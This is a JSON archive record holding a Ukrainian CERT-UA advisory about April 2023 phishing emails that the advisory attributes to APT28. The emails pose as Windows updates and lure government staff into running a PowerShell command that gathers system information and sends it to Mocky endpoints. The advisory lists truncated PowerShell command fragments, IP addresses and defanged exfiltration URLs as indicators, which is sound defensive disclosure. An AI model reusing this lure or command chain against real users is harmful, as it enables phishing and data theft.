{
	"id": "a79c71e5-22cb-4d6c-83fa-97fdca5cfade",
	"created_at": "2026-04-10T03:20:20.062132Z",
	"updated_at": "2026-04-10T13:11:44.057267Z",
	"deleted_at": null,
	"sha1_hash": "619c03c2506c8a4716ecb9053a51af2310af1973",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1818306,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-10 03:07:07 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA протягом квітня 2023\r\nроку зафіксовано випадки розповсюдження серед державних органів України електронних листів з темою\r\n\"Оновлення Windows\", надісланих, начебто, від імені системних адміністраторів відомств. При цьому\r\nелектронні адреси відправників, створені на публічному сервісі \"@outlook.com\", можуть формуватися з\r\nвикористанням справжнього прізвища та ініціалів співробітника.\r\nТиповий лист містить \"інструкцію\" українською мовою щодо \"оновлення для захисту від хакерських атак\",\r\nа також графічні зображення процесу запуску командного рядка та виконання PowerShell-команди.\r\nЗгадана команда завантажить PowerShell-сценарій, який, імітуючи процес оновлення операційної системи,\r\nзабезпечить завантаження й виконання наступного PowerShell-сценарію, призначеного для збору базової\r\nінформації про ЕОМ за допомогою команд \"tasklist\", \"systeminfo\", а також відправку отриманих результатів\r\nза допомогою HTTP запиту до API сервісу Mocky.\r\nРекомендуємо обмежити можливість запуску PowerShell користувачами та забезпечити моніторинг\r\nмережевих з'єднань до API сервісу Mocky.\r\nАктивність здійснюється групою APT28.\r\nІндикатори кіберзагроз\r\nХостові:\r\npowershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?upd\r\npowershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?upd\r\npowershell $update='windows';$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?upd\r\nМережеві:\r\n146[.]70.105.61 (@m247.ro)\r\n77[.]75.78.125 (Received)\r\nhXXp://mockbin[.]org/bin/4aa17a07-7635-4ee0-9f3a-449fcd91f342\r\nhXXp://mockbin[.]org/bin/e8bfd045-2b14-4afc-9372-b723f7d76918\r\nhXXp://mockbin[.]org/bin/b8427b58-7497-46cd-a5b2-6ff6a40b4592\r\nhXXp://run.mocky[.]io/v3/1e88179a-3105-4a5c-9eb3-aebea36e9c21\r\nhXXp://run.mocky[.]io/v3/3b44f33d-b6e5-4ec6-b120-99b6ac52f74b\r\nhXXp://run.mocky[.]io/v3/a4b6625c-226e-4dbc-baec-1dbd854b8015\r\nhXXp://run.mocky[.]io/v3/acea62da-ca05-46d1-bb80-0b036af7467c\r\nhttps://cert.gov.ua/article/4492467\r\nPage 1 of 2\n\nhXXp://run.mocky[.]io/v3/ef206b51-4cf4-4c93-90bf-1e66673315b0\r\nhXXp://run.mocky[.]io/v3/ef4c7798-fc09-42cd-8431-91a22d5728d9\r\nhXXp://run.mocky[.]io/v3/a261411d-b869-4877-86f5-307e32ed6afa\r\nmockbin[.]org (Легітимний сервіс Mocky)\r\nrun.mocky[.]io (Легітимний сервіс Mocky)\r\nГрафічні зображення\r\nSource: https://cert.gov.ua/article/4492467\r\nhttps://cert.gov.ua/article/4492467\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cert.gov.ua/article/4492467"
	],
	"report_names": [
		"4492467"
	],
	"threat_actors": [],
	"ts_created_at": 1775791220,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/619c03c2506c8a4716ecb9053a51af2310af1973.pdf",
		"text": "https://archive.orkl.eu/619c03c2506c8a4716ecb9053a51af2310af1973.txt",
		"img": "https://archive.orkl.eu/619c03c2506c8a4716ecb9053a51af2310af1973.jpg"
	}
}